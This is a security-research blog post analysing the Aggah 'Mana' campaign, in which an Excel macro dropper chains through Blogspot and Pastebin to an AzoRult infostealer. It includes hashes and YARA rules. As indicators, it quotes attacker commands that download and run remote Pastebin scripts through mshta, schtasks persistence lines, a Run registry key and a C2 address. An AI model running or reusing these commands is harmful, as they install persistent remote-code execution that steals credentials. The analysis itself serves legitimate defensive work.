# APT or not APT? What's Behind the Aggah Campaign **[yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/](https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/)** ## Introduction September 24, 2019 During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah [campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated](https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/) with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and [infrastructures, for instance in “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to](https://blog.yoroi.company/research/the-enigmatic-roma225-campaign/) the RG Campaign” reports. But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities. ## Technical Analysis **Hash** 7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87 **Threat** Excel document Dropper **Brief** **Description** First stage of Aggah campaign **Ssdeep** 768:4Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJrqYtAd/fBuzPRtUb:hk3hOdsylKlgxopeiBNhZFGzE+cL2kd3 Table 1. Sample’s information As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command: ----- mshta.exe http://bit[.ly/8hsshjahassahsh The bit.ly link redirects on the attacker’s page hosted on Blogspot at _hxxps://myownteammana.blogspot[.com/p/otuego4thday.html.This is the typical Aggah modus operandi. In fact, the_ webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine. Figure 1. HTA script hidden into Blogspot page Figure 2. Deobfuscated HTA script This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot. Figure 3. Another obfuscated Javascript snippet In detail, the malware uses three mechanisms to ensure its persistence on the victim machine: the creation of a new task called “Windows Update” that triggers every 60 minutes; the creation of another task called “Update” that triggers every 300 minutes; the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate” registry key; Each entry contact pastebin.com to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes. Figure 4. Code used to set persistence During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin. Figure 5. Deobfuscation process Figure 6. Powershell script used to inject the final payload in legit process [The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is](https://blog.yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/) the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage. ### The AzoRult Payload **Hash** 37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1 **Threat** AzoRult **Brief Description** AzoRult final payload **Ssdeep** 3072:tuOSXpMx7ZAlHsbfUkolNGti7lfqeSxM3SpyEY3E/qxg/:Zzx7ZApszolIo7lf/ipT/q Table 3. Sample’s information This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data. Figure 7. AzoRult tries to extract info from browsers files Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain. Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2 ----- ## Conclusion We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples. The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, [the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible](https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/) that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer. ## Indicator of Compromise Hashes 7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87 84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6 37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1 c2d594e23480215c94dc7f79cf50af3b3b4270fa3a60aea81f877bd787a684a4 a318ce12ddd1b512c1f9ab1280dc25a254d2a1913e021ae34439de9163354243 cfd1363ce16156e55460b29bf4d62045ebcd5180af50d732c2353daf12618c18 Persistence schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe [http://pastebin.com/raw/vXpe74L2](https://pastebin.com/raw/vXpe74L2) /F schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr mshta.exe [http://pastebin.com/raw/JdTuFmc5 /F](https://pastebin.com/raw/JdTuFmc5) HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate C2 hxxp://170.130.205.86/index.php ### Yara Rules ----- ``` p p rule Mana_Aggah_campaign_excel_dropper_Sep_2019{ meta: description = "Yara Rule for Mana campaign Excel dropper" author = "Cybaze Zlab_Yoroi" last_updated = "2019-09-18" tlp = "white" category = "informational" strings: $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29} $a2 = {61 70 74 77 4D 71 55 45 27} condition: all of them } rule Mana_Aggah_campaign_injector_Sep_2019{ meta: description = "Yara Rule for Mana campaign DLL injector" author = "Cybaze Zlab_Yoroi" last_updated = "2019-09-18" tlp = "white" category = "informational" strings: $a1 = {4D 5A} $a2 = {93 E5 21 3F 59 AE} $a3 = {11 08 28 22} $a4 = "v2.0.507" $a5 = {E2 80 8C E2 80} $a6 = {81 AC E2 81 AF E2 80 AE} $a7 = {E2 81 AA E2 80} $a8 = {81 AF E2 80 AA} $a9 = {81 AC E2 81 AF E2 80 AE} $a10 = {C5 C7 4C 9E 65 A5 B6 42} condition: 6 of ($a*) } rule Mana_Aggah_campaign_AzoRult_Sep_2019{ meta: description = "Yara Rule for Mana campaign AzoRult sample" author = "Cybaze Zlab_Yoroi" last_updated = "2019-09-18" tlp = "white" category = "informational" strings: $h1 = {4D 5A 50} $bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8} $bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8} $bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8} $s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide $s2 = "moz_historyvisits.visit_date" ascii wide $s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide condition: $h1 and all of ($s*) and 1 of ($bob*) } ``` _This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB_ -----